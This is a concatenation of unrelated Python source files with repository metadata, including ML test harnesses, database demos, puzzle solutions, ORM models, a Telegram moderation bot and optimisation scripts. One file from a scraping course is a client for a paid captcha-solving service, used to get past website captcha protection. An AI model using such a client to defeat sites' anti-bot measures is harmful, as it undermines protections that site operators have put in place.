print("[INFO] fp32 results: {}".format(self.ft_fp32_score))
assert(self.ft_fp32_score['f1'] > self.tf_fp32_score['f1'] - 0.1)
assert(self.ft_fp32_score['exact_match'] > self.tf_fp32_score['exact_match'] - 0.1)
def test_squad_fp16(self):
print("[INFO] test_squad_fp16")
os.system("./bin/encoder_gemm 8 384 12 64 1 0")
os.system("python tensorflow/tensorflow_bert/run_squad_wrap.py \
--floatx=float16 \
--predict_batch_size=8 \
--vocab_file=squad_model/vocab.txt \
--bert_config_file=squad_model/bert_config.json \
--init_checkpoint={} \
--train_file=squad_data/train-v1.1.json \
--do_predict=True \
--predict_file=squad_data/dev-v1.1.json \
--max_seq_length=384 \
--output_dir={}".format(self.fp16_model_path, self.ft_fp16_output_path))
os.system("rm gemm_config.in")
self.ft_fp16_score = self.run_evaluate(self.ft_fp16_output_path + self.predict_filename)
print("[INFO] fp16 results: {}".format(self.ft_fp16_score))
assert(self.ft_fp16_score['f1'] > self.tf_fp32_score['f1'] - 0.1)
assert(self.ft_fp16_score['exact_match'] > self.tf_fp32_score['exact_match'] - 0.1)
def test_squad_fp16_varSeqlen(self):
print("[INFO] test_squad_fp16_varSeqlen")
os.system("python tensorflow/tensorflow_bert/run_squad_wrap.py \
--floatx=float16 \
--predict_batch_size=8 \
--vocab_file=squad_model/vocab.txt \
--bert_config_file=squad_model/bert_config.json \
--init_checkpoint={} \
--train_file=squad_data/train-v1.1.json \
--do_predict=True \
--predict_file=squad_data/dev-v1.1.json \
--max_seq_length=384 \
--remove_padding=True \
--output_dir={}".format(self.fp16_model_path, self.ft_fp16_output_path))
self.ft_fp16_score_var_seqlen = self.run_evaluate(self.ft_fp16_output_path + self.predict_filename)
print("[INFO] fp16 var seqlen results: {}".format(self.ft_fp16_score_var_seqlen))
assert(self.ft_fp16_score_var_seqlen['f1'] > self.tf_fp32_score['f1'] - 0.1)
assert(self.ft_fp16_score_var_seqlen['exact_match'] > self.tf_fp32_score['exact_match'] - 0.1)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
arXiv-research.noreply@github.com
|
16c119f54f2264d169dc7c2f07b131d64908f831
|
9e5bf5e7d0bdfa4ff2aca65ac306ed801d146608
|
/python-26-pydb/pydb_07_blob.py
|
6afad0b37eb1f44b3fb571eef749d6f9edb40632
|
[] |
no_license
|
AuroraBoreas/python_advanced_tricks
|
90b07967789960beec381de676459c1e84b95860
|
ba0940e25eda52345a27cf9ddffed9d18fa2a031
|
refs/heads/master
| 2022-11-27T19:09:45.666017
| 2020-08-11T17:33:11
| 2020-08-11T17:33:11
| 275,083,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,887
|
py
|
import os, sqlite3
def convert_to_bytes(file):
with open(file, 'rb') as f:
data = f.read()
return data
def convert_to_file(data, filename):
with open(filename, 'wb') as f:
f.write(data)
return
def create_table():
db_path = os.path.join(os.path.dirname(__file__), "blob.db")
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
sql_cmd = """CREATE TABLE employees
(id INTEGER PRIMARY KEY,
name TEXT NOT NULL,
photo BLOB NOT NULL,
resume BLOB NOT NULL);"""
cursor.execute(sql_cmd)
conn.commit()
print("Created table successfully.")
cursor.close()
except sqlite3.Error as e:
print("Creating table failed.", e)
finally:
if conn:
conn.close()
return
def insertBlob(employeeId, name, picture, resume):
db_path = os.path.join(os.path.dirname(__file__), "blob.db")
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
sql_cmd = """INSERT INTO employees
(id, name, photo, resume)
VALUES (?, ?, ?, ?)"""
employPic = convert_to_bytes(picture)
employRes = convert_to_bytes(resume)
record = (employeeId, name, employPic, employRes)
cursor.execute(sql_cmd, record)
conn.commit()
print("Inserted the record successfully.")
cursor.close()
except sqlite3.Error as e:
print("Inserting record failed.", e)
conn.rollback()
finally:
if conn:
conn.close()
return
def readBlob():
db_path = os.path.join(os.path.dirname(__file__), "blob.db")
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
sql_cmd = """SELECT * FROM employees"""
cursor.execute(sql_cmd)
for result in cursor.fetchall():
Id, name, bytesphoto, bytesresume = result
empphoto_path = os.path.join(os.path.dirname(__file__), f"picture_{Id}_{name}.jfif")
empres_path = os.path.join(os.path.dirname(__file__), f"resume_{Id}_{name}.jfif")
convert_to_file(bytesphoto, empphoto_path)
convert_to_file(bytesresume, empres_path)
print(f"id:{Id}, name:{name}")
os.startfile(empphoto_path)
os.startfile(empres_path)
except sqlite3.Error as e:
print("Error occurred.", e)
finally:
if conn:
conn.close()
return
create_table()
employId = 1
name = 'cat'
picture = os.path.join(os.path.dirname(__file__), r"data\employees\picture.jfif")
resume = os.path.join(os.path.dirname(__file__), r"data\employees\resume.jfif")
insertBlob(employId, name, picture, resume)
readBlob()
|
[
"noreply@github.com"
] |
AuroraBoreas.noreply@github.com
|
0c0b62f6266aab1d890fe4d7d07d06120fad7782
|
9fcd6a91132fd12731d259fe7d709cdf222381bb
|
/2022/14/foo.py
|
f620615c11d7f8917af8cb384035406dd2be5cb9
|
[] |
no_license
|
protocol7/advent-of-code
|
f5bdb541d21414ba833760958a1b9d05fc26f84a
|
fa110cef83510d86e82cb5d02f6af5bb7016f2c7
|
refs/heads/master
| 2023-04-05T15:33:26.146031
| 2023-03-18T14:22:43
| 2023-03-18T14:22:43
| 159,989,507
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
import sys
from itertools import *
from util import *
def parse(line):
return chunks(ints(line), 2)
xs = list(map(parse, sys.stdin))
d = set()
for row in xs:
for (x1, y1), (x2, y2) in zip(row, row[1:]):
for x in diffrange(x1, x2):
for y in diffrange(y1, y2):
d.add((x, y))
maxy = max(y for _, y in d)
part1 = True
for c in count():
sx, sy = (500, 0)
while True:
if sy == maxy + 1:
if part1:
print(c)
part1 = False
# on bottom floor, rest
d.add((sx, sy))
break
elif (sx, sy+1) not in d:
# point below is free
sy += 1
elif (sx-1, sy+1) not in d:
# point below and to the left is free
sx -= 1
sy += 1
elif (sx+1, sy+1) not in d:
# point below and to the right is free
sx += 1
sy += 1
elif (sx, sy) not in d:
# we can't move down and we haven't fill up all the way, rest here
d.add((sx, sy))
break
else:
# filled up all the way, we're done with part 2
print(c)
sys.exit()
|
[
"niklas@protocol7.com"
] |
niklas@protocol7.com
|
74039f87a612a65381e0ed6e6eed92f1022e8968
|
4e0ff785b993b6bae70745434e61f27ca82e88f0
|
/289-Game-of-Life/solution.py
|
0c90ed85355a13a6e97b67dbdb013dde336eef3d
|
[] |
no_license
|
NobodyWHU/Leetcode
|
2ee557dd77c65c5fa8ca938efb6de3793b4de261
|
d284fa3daab02531e5300867463b293d44737e32
|
refs/heads/master
| 2021-01-23T14:05:28.161062
| 2016-09-23T11:51:51
| 2016-09-23T11:51:51
| 58,898,114
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 998
|
py
|
class Solution(object):
def live_nbrs(self,board,i,j,m,n):
ms=max(0,i-1)
ns=max(0,j-1)
me=min(m,i+2)
ne=min(n,j+2)
count=0
for i1 in xrange(ms,me):
for j1 in xrange(ns,ne):
if board[i1][j1]&1:
count+=1
return count-(board[i][j]&1)
def gameOfLife(self, board):
"""
:type board: List[List[int]]
:rtype: void Do not return anything, modify board in-place instead.
"""
m=len(board)
if not m:
return
n=len(board[0])
lm,ln=map(xrange,[m,n])
for i in lm:
for j in ln:
num=self.live_nbrs(board,i,j,m,n)
if not (board[i][j]&1):
board[i][j]=bool(num==3)<<1
else:
board[i][j]+=bool(num not in [2,3])<<1
for i in lm:
for j in ln:
board[i][j]=((board[i][j]&2)>>1)^(board[i][j]&1)
|
[
"haohaoranran@126.com"
] |
haohaoranran@126.com
|
d4f48a70ecf3ae87af021116d62c44cd8a0dac42
|
49d9fe8a1c83699e41b9cd4e6764e640e69243a8
|
/ekd_documents_stage.py
|
7fd8bb338614c646298456ea7da30a8793837927
|
[] |
no_license
|
postcoder/ekd_documents
|
11945361052e2052848aa71e6f425c5d9bb92802
|
083e1d37e39803aa9dde69b596bbb9305ec35d7b
|
refs/heads/master
| 2020-12-11T07:39:35.646593
| 2011-03-31T05:25:03
| 2011-03-31T05:25:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,081
|
py
|
# -*- coding: utf-8 -*-
"Document Stage"
from trytond.model import ModelView, ModelSQL, fields
from trytond.transaction import Transaction
class DocumentTemplateStage(ModelSQL, ModelView):
"Document Template"
_name='ekd.document.template.stage'
_description=__doc__
_order_name = "sequence"
template = fields.Many2One('ekd.document.template', 'Template')
name = fields.Char('Name', size=128)
shortcut = fields.Char('ShortCut', size=32)
sequence = fields.Integer('Sequence', help="Change with *10")
date_start = fields.Date('Date Start')
date_end = fields.Date('Date end')
code_call = fields.Char('Code Call')
active = fields.Boolean('Active')
def default_active(self):
return True
DocumentTemplateStage()
class Document(ModelSQL, ModelView):
_name='ekd.document.template'
stages = fields.One2Many('ekd.document.template.stage', 'template', 'Stages')
Document()
class Document(ModelSQL, ModelView):
_name='ekd.document'
stage = fields.Many2One('ekd.document.template.stage', 'Stage')
Document()
|
[
"k-dmitry2@narod.ru"
] |
k-dmitry2@narod.ru
|
17c0559b0457907a1e73225e13128fc0575b7451
|
53164813be4f539d65ef985da732d1890eb91693
|
/company/serializers.py
|
c7f078274e8118c7d9a997dd41d14a109aaeade3
|
[] |
no_license
|
surajmondal1003/erp_tribeni
|
8ea3e19d3afcdeed6e0114de61ba086043d98303
|
1972e7a18853a30ac85c6fa0487fed9dbcef4381
|
refs/heads/master
| 2020-03-19T09:51:34.780672
| 2018-06-29T09:04:25
| 2018-06-29T09:04:25
| 136,322,677
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,474
|
py
|
from company.models import Company,TermsandConditon
from states.models import State
from rest_framework import serializers
from rest_framework.serializers import ModelSerializer
from rest_framework.validators import UniqueValidator
class ChildrenSerializer(serializers.Serializer):
def to_representation(self, value):
serializer = self.parent.parent.__class__(value, context=self.context)
return serializer.data
class CompanySerializer(ModelSerializer):
company_name = serializers.CharField(
validators=[UniqueValidator(queryset=Company.objects.all())]
)
created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
status=serializers.BooleanField(default=True)
children=ChildrenSerializer(many=True, read_only=True)
company_url = serializers.CharField(required=False, allow_blank=True) # Not mandatory field
company_gst = serializers.CharField(required=False, allow_blank=True) # Not mandatory field
company_pan = serializers.CharField(required=False, allow_blank=True) # Not mandatory field
company_cin = serializers.CharField(required=False, allow_blank=True) # Not mandatory field
company_email = serializers.EmailField(required=False, allow_blank=True) # Not mandatory field
class Meta:
model = Company
fields = ['id','parent','company_name','company_url','company_gst','company_pan','company_cin','company_email',
'company_address','company_contact','company_state','company_city','company_pin','status','created_at',
'created_by','is_deleted','children']
class CompanyListSerializer(ModelSerializer):
class Meta:
model = Company
fields = ['id','company_name']
class TermsAndConditionSerializer(ModelSerializer):
created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
status = serializers.BooleanField(default=True)
class Meta:
model = TermsandConditon
fields = ['id','company','term_type','term_text','status','created_at','created_by','is_deleted']
class TermsAndConditionReadSerializer(ModelSerializer):
created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
status = serializers.BooleanField(default=True)
company=CompanyListSerializer()
class Meta:
model = TermsandConditon
fields = ['id','company','term_type','term_text','status','created_at','created_by','is_deleted']
|
[
"surajmondal1003@gmail.com"
] |
surajmondal1003@gmail.com
|
a6abacfc9321ad09afffc9432695b4d237820cb0
|
f95d2646f8428cceed98681f8ed2407d4f044941
|
/AI/day03/ai01.py
|
63d018d7e9fa8009a76ae0d7321bc2a6daf4214c
|
[] |
no_license
|
q2806060/python-note
|
014e1458dcfa896f2749c7ebce68b2bbe31a3bf8
|
fbe107d668b44b78ae0094dbcc7e8ff8a4f8c983
|
refs/heads/master
| 2020-08-18T01:12:31.227654
| 2019-10-17T07:40:40
| 2019-10-17T07:40:40
| 215,731,114
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,393
|
py
|
import sklearn.tree as st
import sklearn.ensemble as se
import numpy as np
import sklearn.utils as su
import sklearn.metrics as sm
import matplotlib.pyplot as mp
data = np.loadtxt('C:\\Users\\Administrator\\Desktop\\sucai\\ml_data\\bike_day.csv',
delimiter=',', unpack=False, dtype='U20')
# 获取输入集与输出集
header = data[0, 2:13]
x = np.array(data[1:, 2:13], dtype=float)
y = np.array(data[1:, -1], dtype=float)
# 打乱数据集
x, y = su.shuffle(x, y, random_state=7)
# 查分训练集,测试集
train_size = int(len(x) * 0.9)
train_x, test_x, train_y, test_y = x[:train_size], x[train_size:], y[:train_size], y[train_size:]
# 随机森林模型训练
model = se.RandomForestRegressor(max_depth=10, n_estimators=1000, min_samples_split=2)
model.fit(train_x, train_y)
pred_test_y = model.predict(test_x)
# 使用r2得分验证预测结果
print(sm.r2_score(test_y, pred_test_y))
# 输出特征重要性
fi_day = model.feature_importances_
print(fi_day)
print(header)
# 绘制特征重要性柱状图
mp.figure('Bike', facecolor='lightgray')
mp.subplot(211)
mp.title('Day', fontsize=16)
mp.ylabel("Imporeances", fontsize=12)
mp.tick_params(labelsize=8)
mp.grid(linestyle=':')
pos = np.arange(fi_day.size)
sorted_i = fi_day.argsort()[::-1]
mp.xticks(pos, header[sorted_i])
mp.bar(pos, fi_day[sorted_i], color='dodgerblue', label='Bike_Day')
mp.legend()
mp.show()
|
[
"C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn"
] |
C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn
|
ed34f5a1992dc92768d5c72071118192afc81a60
|
58f095f52d58afa9e8041c69fa903c5a9e4fa424
|
/examples/test_dejong3.py
|
7278675f06b5173756538e602b0627bca01a6010
|
[
"BSD-3-Clause"
] |
permissive
|
cdeil/mystic
|
e41b397e9113aee1843bc78b5b4ca30bd0168114
|
bb30994987f36168b8f09431cb9c3823afd892cd
|
refs/heads/master
| 2020-12-25T23:18:52.086894
| 2014-08-13T14:36:09
| 2014-08-13T14:36:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,742
|
py
|
#!/usr/bin/env python
#
# Author: Patrick Hung (patrickh @caltech)
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2014 California Institute of Technology.
# License: 3-clause BSD. The full license text is available at:
# - http://trac.mystic.cacr.caltech.edu/project/mystic/browser/mystic/LICENSE
"""
Sets up De Jong's Third function. This is problem 3 of testbed 1 in [1].
Note: The function as defined by Eq.8 of [1] seems incomplete.
Reference:
[1] Storn, R. and Price, K. Differential Evolution - A Simple and Efficient
Heuristic for Global Optimization over Continuous Spaces. Journal of Global
Optimization 11: 341-359, 1997.
[2] Storn, R. and Proce, K. Same title as above, but as a technical report.
try: http://www.icsi.berkeley.edu/~storn/deshort1.ps
"""
from mystic.solvers import DifferentialEvolutionSolver
from mystic.termination import ChangeOverGeneration, VTR
from mystic.models.dejong import step as DeJong3
import random
random.seed(123)
ND = 5
NP = 25
MAX_GENERATIONS = 2500
def main():
solver = DifferentialEvolutionSolver(ND, NP)
solver.SetRandomInitialPoints(min = [-5.12]*ND, max = [5.12]*ND)
solver.SetEvaluationLimits(generations=MAX_GENERATIONS)
solver.Solve(DeJong3, termination=VTR(0.00001), \
CrossProbability=0.3, ScalingFactor=1.0)
solution = solver.Solution()
print solution
if __name__ == '__main__':
from timeit import Timer
# optimize with DESolver
t = Timer("main()", "from __main__ import main")
timetaken = t.timeit(number=1)
print "CPU Time: %s\n" % timetaken
# optimize with fmin
from mystic.solvers import fmin
print fmin(DeJong3, [0 for i in range(ND)])
# end of file
|
[
"mmckerns@968178ea-60bd-409e-af13-df8a517b6005"
] |
mmckerns@968178ea-60bd-409e-af13-df8a517b6005
|
d7fd85dcb22795bc5b355d57accac43d35b1e6b2
|
290dfba092f9f88eb62e1b37ea290f01f836acd7
|
/methylation/bicluster_analysis/run_hmf_mtf_store_matrices.py
|
5760d111f9af9bad3f5077e6aed7ebc95ebff383
|
[] |
no_license
|
rintukutum/HMF
|
fb1ce6f76064bef6b9a6fd5cfeaccd16cf624cd6
|
87c1bc73ddc375c56ab101185d7fc1b98df1c1ba
|
refs/heads/master
| 2020-04-04T10:17:11.722275
| 2018-06-10T10:21:36
| 2018-06-10T10:21:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,482
|
py
|
"""
Run the HMF D-MTF method on the methylation datasets, and store the expectation
of the factor matrices F, Sn.
"""
import sys, os
project_location = os.path.dirname(__file__)+"/../../../"
sys.path.append(project_location)
from HMF.code.models.hmf_Gibbs import HMF_Gibbs
from HMF.methylation.load_methylation import filter_driver_genes_std
import numpy
''' Settings HMF '''
iterations, burn_in, thinning = 200, 150, 2 # 1000, 800, 5 #
indices_thinning = range(burn_in,iterations,thinning)
settings = {
'priorF' : 'normal',
'priorSn' : ['normal','normal','normal'],
'orderF' : 'columns',
'orderSn' : ['rows','rows','rows'],
'ARD' : True,
'element_sparsity' : True,
}
hyperparameters = {
'alphatau' : 1,
'betatau' : 1,
'alpha0' : 0.001,
'beta0' : 0.001,
'alphaS' : 1.,
'betaS' : 0.001,
'lambdaF' : 0.1,
}
init = {
'F' : 'kmeans',
'Sn' : 'least',
'lambdat' : 'exp',
'tau' : 'exp'
}
E = ['genes','samples']
K = {'genes':20, 'samples':20}
alpha_n = [1., 1., 1.] # GE, PM, GM
''' Load in data '''
R_ge, R_pm, R_gm, genes, samples = filter_driver_genes_std()
M_ge, M_pm, M_gm = numpy.ones(R_ge.shape), numpy.ones(R_pm.shape), numpy.ones(R_gm.shape)
R = [
(R_ge, M_ge, 'genes', 'samples', alpha_n[0]),
(R_pm, M_pm, 'genes', 'samples', alpha_n[1]),
(R_gm, M_gm, 'genes', 'samples', alpha_n[1]),
]
C, D = [], []
''' Run the Gibbs sampler '''
HMF = HMF_Gibbs(R,C,D,K,settings,hyperparameters)
HMF.initialise(init)
HMF.run(iterations)
''' Store the mean of the matrices. '''
folder = project_location+'HMF/methylation/bicluster_analysis/matrices/'
E_drugs, E_cell_lines = 'genes', 'samples'
n_ge, n_pm, n_gm = 0, 1, 2
exp_F_genes = HMF.approx_expectation_Ft(E=E_drugs, burn_in=burn_in, thinning=thinning)
exp_F_samples = HMF.approx_expectation_Ft(E=E_cell_lines, burn_in=burn_in, thinning=thinning)
exp_S_ge = HMF.approx_expectation_Sn(n=n_ge, burn_in=burn_in, thinning=thinning)
exp_S_pm = HMF.approx_expectation_Sn(n=n_pm, burn_in=burn_in, thinning=thinning)
exp_S_gm = HMF.approx_expectation_Sn(n=n_gm, burn_in=burn_in, thinning=thinning)
numpy.savetxt(fname=folder+'F_genes', X=exp_F_genes)
numpy.savetxt(fname=folder+'F_samples', X=exp_F_samples)
numpy.savetxt(fname=folder+'S_ge', X=exp_S_ge)
numpy.savetxt(fname=folder+'S_pm', X=exp_S_pm)
numpy.savetxt(fname=folder+'S_gm', X=exp_S_gm)
|
[
"tab43@cam.ac.uk"
] |
tab43@cam.ac.uk
|
d95c6a72d162c022ff13a6a9180b38d6dc4d03f7
|
26f8a8782a03693905a2d1eef69a5b9f37a07cce
|
/test/test_destiny_definitions_destiny_item_stat_block_definition.py
|
fd1caacbe42ae8f19d925e97ff45e137b5b68be2
|
[] |
no_license
|
roscroft/openapi3-swagger
|
60975db806095fe9eba6d9d800b96f2feee99a5b
|
d1c659c7f301dcfee97ab30ba9db0f2506f4e95d
|
refs/heads/master
| 2021-06-27T13:20:53.767130
| 2017-08-31T17:09:40
| 2017-08-31T17:09:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
# coding: utf-8
"""
Bungie.Net API
These endpoints constitute the functionality exposed by Bungie.net, both for more traditional website functionality and for connectivity to Bungie video games and their related functionality.
OpenAPI spec version: 2.0.0
Contact: support@bungie.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.destiny_definitions_destiny_item_stat_block_definition import DestinyDefinitionsDestinyItemStatBlockDefinition
class TestDestinyDefinitionsDestinyItemStatBlockDefinition(unittest.TestCase):
""" DestinyDefinitionsDestinyItemStatBlockDefinition unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testDestinyDefinitionsDestinyItemStatBlockDefinition(self):
"""
Test DestinyDefinitionsDestinyItemStatBlockDefinition
"""
# FIXME: construct object with mandatory attributes with example values
#model = swagger_client.models.destiny_definitions_destiny_item_stat_block_definition.DestinyDefinitionsDestinyItemStatBlockDefinition()
pass
if __name__ == '__main__':
unittest.main()
|
[
"adherrling@gmail.com"
] |
adherrling@gmail.com
|
e42222439cae23f5147a01df166ec8da65f2e33b
|
4de0c6d3a820d7669fcef5fd035416cf85b35f23
|
/ITcoach/爬虫课件/第五章:requests模块高级/CodeClass.py
|
74cf4cb614e8aae221e9f0d2e98fadb407dfbb64
|
[
"AFL-3.0"
] |
permissive
|
ww35133634/chenxusheng
|
5e1b7391a94387b73bcd7c4d12f1247b79be8016
|
666e0eb3aedde46342faf0d4030f5c72b10c9732
|
refs/heads/master
| 2022-11-12T03:46:47.953680
| 2020-07-02T20:50:56
| 2020-07-02T20:50:56
| 275,168,080
| 0
| 0
|
AFL-3.0
| 2020-07-02T20:58:37
| 2020-06-26T13:54:48
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,265
|
py
|
import http.client, mimetypes, urllib, json, time, requests
######################################################################
class YDMHttp:
apiurl = 'http://api.yundama.com/api.php'
username = ''
password = ''
appid = ''
appkey = ''
def __init__(self, username, password, appid, appkey):
self.username = username
self.password = password
self.appid = str(appid)
self.appkey = appkey
def request(self, fields, files=[]):
response = self.post_url(self.apiurl, fields, files)
response = json.loads(response)
return response
def balance(self):
data = {'method': 'balance', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['balance']
else:
return -9001
def login(self):
data = {'method': 'login', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey}
response = self.request(data)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['uid']
else:
return -9001
def upload(self, filename, codetype, timeout):
data = {'method': 'upload', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey, 'codetype': str(codetype), 'timeout': str(timeout)}
file = {'file': filename}
response = self.request(data, file)
if (response):
if (response['ret'] and response['ret'] < 0):
return response['ret']
else:
return response['cid']
else:
return -9001
def result(self, cid):
data = {'method': 'result', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey, 'cid': str(cid)}
response = self.request(data)
return response and response['text'] or ''
def decode(self, filename, codetype, timeout):
cid = self.upload(filename, codetype, timeout)
if (cid > 0):
for i in range(0, timeout):
result = self.result(cid)
if (result != ''):
return cid, result
else:
time.sleep(1)
return -3003, ''
else:
return cid, ''
def report(self, cid):
data = {'method': 'report', 'username': self.username, 'password': self.password, 'appid': self.appid,
'appkey': self.appkey, 'cid': str(cid), 'flag': '0'}
response = self.request(data)
if (response):
return response['ret']
else:
return -9001
def post_url(self, url, fields, files=[]):
for key in files:
files[key] = open(files[key], 'rb');
res = requests.post(url, files=files, data=fields)
return res.text
|
[
"82516351@qq.com"
] |
82516351@qq.com
|
1defa08cad2feb8f0a409a161b01ac1c0c65ac80
|
bf6329ef922505a5c8c4797d6011e81295b753ad
|
/extensions/ban_my_self.py
|
0b5f77f80215955f3d893588af9b7870b1d9bb37
|
[] |
no_license
|
Xi-Plus/Ethics-Committee
|
b4ed9077bc4113a8d42caf55198b78e3bb18c8bf
|
cd79dfc5b936b80ac8250f61261d45ad95a4fc55
|
refs/heads/master
| 2023-08-30T21:29:21.782947
| 2023-08-20T09:20:47
| 2023-08-20T09:20:47
| 134,817,641
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,642
|
py
|
import re
import time
import telegram
from Kamisu66 import EthicsCommitteeExtension
class BanMySelf(EthicsCommitteeExtension): # pylint: disable=W0223
MODULE_NAME = 'ban_my_self'
COMMAND = r'^/banmyself@Kamisu66EthicsCommitteeBot$'
DURATION = 60
def __init__(self, enabled_chat_id):
self.enabled_chat_id = enabled_chat_id
def main(self, EC):
update = EC.update
if update.effective_chat.id not in self.enabled_chat_id:
return
if not update.message or not update.message.text:
return
if re.search(self.COMMAND, update.message.text):
EC.bot.delete_message(update.effective_chat.id, update.message.message_id)
chatMember = update.effective_chat.get_member(update.effective_user.id)
if chatMember.status not in [chatMember.ADMINISTRATOR, chatMember.CREATOR]:
try:
until_date = until_date = int(time.time() + self.DURATION)
EC.bot.ban_chat_member(
chat_id=update.effective_chat.id,
user_id=update.effective_user.id,
until_date=until_date,
)
except telegram.error.BadRequest as e:
EC.log('[ban_my_self] restrict {} in {} failed: {}'.format(
update.effective_user.id, update.effective_chat.id, e.message))
else:
EC.log('[ban_my_self] skip restrict {} in {}'.format(
update.effective_user.id, update.effective_chat.id))
def __mainclass__():
return BanMySelf
|
[
"huangxuanyuxiplus@gmail.com"
] |
huangxuanyuxiplus@gmail.com
|
6bada32e456c251b91a0d28e117d3aca206621b0
|
cefab48dff8fc40786f0a45f3df272646365e9f5
|
/python/pyMARS_old/python_mars_scripts2a/delete_files.py
|
88f6d9bb47f4e0691b88aa8e27a717a6af9434ba
|
[] |
no_license
|
shaunhaskey/pyMARS
|
d40265bd2d445f0429ae7177f2e75d83f0ba8b30
|
e2424088492a8ab2f34acf62db42a77e44d5bc3b
|
refs/heads/master
| 2020-12-25T17:24:28.392539
| 2016-08-01T22:14:27
| 2016-08-01T22:14:27
| 17,684,575
| 0
| 0
| null | 2014-03-13T03:41:59
| 2014-03-12T21:21:08
|
Python
|
UTF-8
|
Python
| false
| false
| 1,194
|
py
|
import numpy as num
import time, os, sys, string, re, csv, pickle
import scipy.interpolate as interpolate
from matplotlib.mlab import griddata
################ SET THESE BEFORE RUNNING!!!!########
project_dir = '/scratch/haskeysr/mars/project1_new_eq/'
pickle_file_name = '9_project1_new_eq_COIL_upper_post_setup_new_low_beta2.pickle'
#folders = 'RUNrfa_FEEDI-120.p RUNrfa_FEEDI-120.vac RUNrfa_FEEDI-240.p RUNrfa_FEEDI-240.vac RUNrfa_FEEDI-60.p RUNrfa_FEEDI-60.vac'
folders = 'OUTRMAR OUTVMAR'
##################################
#Open previous data structure
pickle_file = open(pickle_file_name,'r')
project_dict = pickle.load(pickle_file)
pickle_file.close()
total = len(project_dict['sims'].keys())
count = 0
fails = 0
for current in project_dict['sims'].keys():
original_chease_dir = project_dict['sims'][current]['dir_dict']['chease_dir']
chease_pest_dir = original_chease_dir[:-1]+'_PEST/'
print chease_pest_dir
try:
os.chdir(chease_pest_dir)
string_command = 'rm '+ folders
os.system(string_command)
except:
fails += 1
print 'dir not found'
print 'finished %d of %d,fails %d'%(count,total,fails)
count += 1
|
[
"shaunhaskey@gmail.com"
] |
shaunhaskey@gmail.com
|
3227d0444c8e269c7a4c93dd6a9209005345f469
|
f67b772f58bf153f76dab5521f982d01dc57c12b
|
/permission.py
|
4d8840f6aae8bab09699845a5b79ed461fa3b87a
|
[] |
no_license
|
culibraries/ark-django-app
|
5eddb5f2bd5057a81d100eddb549a15e86852f28
|
355527ce36770c0d27dcf6c524154ac45b9d6e83
|
refs/heads/main
| 2023-02-24T05:08:12.421615
| 2020-09-21T20:34:41
| 2020-09-21T20:34:41
| 287,331,709
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
from rest_framework import permissions
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import Permission
class arkPermission(permissions.BasePermission):
def has_permission(self, request, view):
if request.method in permissions.SAFE_METHODS:
return True
else:
if request.user and request.user.groups.filter(name='ark-admin'):
return True
return False
|
[
"mbstacy@gmail.com"
] |
mbstacy@gmail.com
|
016c2124a86821c015a56c70460990d39129c536
|
384fc08ee847e186a6f2e555a930d6d175728ee2
|
/scripts/disp_client.py
|
6f77e04f574be90f725dcbe9556b503a7957f313
|
[] |
no_license
|
mrmh2/scaleca
|
ae2d1ada7b8ea423d2c1e1b44787d31347d5bfbd
|
4374dc5e6d09eeb4ce3ceea51a0a9e7b50dabbfe
|
refs/heads/master
| 2021-03-12T22:48:26.945721
| 2013-08-27T14:24:19
| 2013-08-27T14:24:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,389
|
py
|
#!/usr/bin/env python
"""disp_client.py - simple text display client.
Connects to server, then constructs simple update loop which sends a command to
the server to run a simulation timestep, then displays the results."""
import os
import sys
import zmq
import numpy as np
def setup():
parent, cdir = os.path.split(os.path.dirname(__file__))
sys.path.append(parent)
from scaleca.disp_simple import CADisplay
globals()['CADisplay'] = CADisplay
def connect_to_server(port):
context = zmq.Context()
#print "Connecting to server..."
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:%s" % port)
return socket
def string_state_to_array(sstate, shape):
c_sep = ','.join(sstate)
one_d = np.fromstring(c_sep, dtype=np.uint8, sep=',')
return one_d.reshape(shape)
def unpack_string_rep(sstate):
dim, astring = sstate.split(':')
shape = map(int, dim.split(','))
astate = string_state_to_array(astring, shape)
return astate
def make_update_loop(socket):
def update_loop():
socket.send('RUN')
message = socket.recv()
return unpack_string_rep(message)
return update_loop
def main():
setup()
port = "5556"
socket = connect_to_server(port)
ul = make_update_loop(socket)
display = CADisplay()
display.run_display(ul)
if __name__ == '__main__':
main()
|
[
"mhartley@cantab.net"
] |
mhartley@cantab.net
|
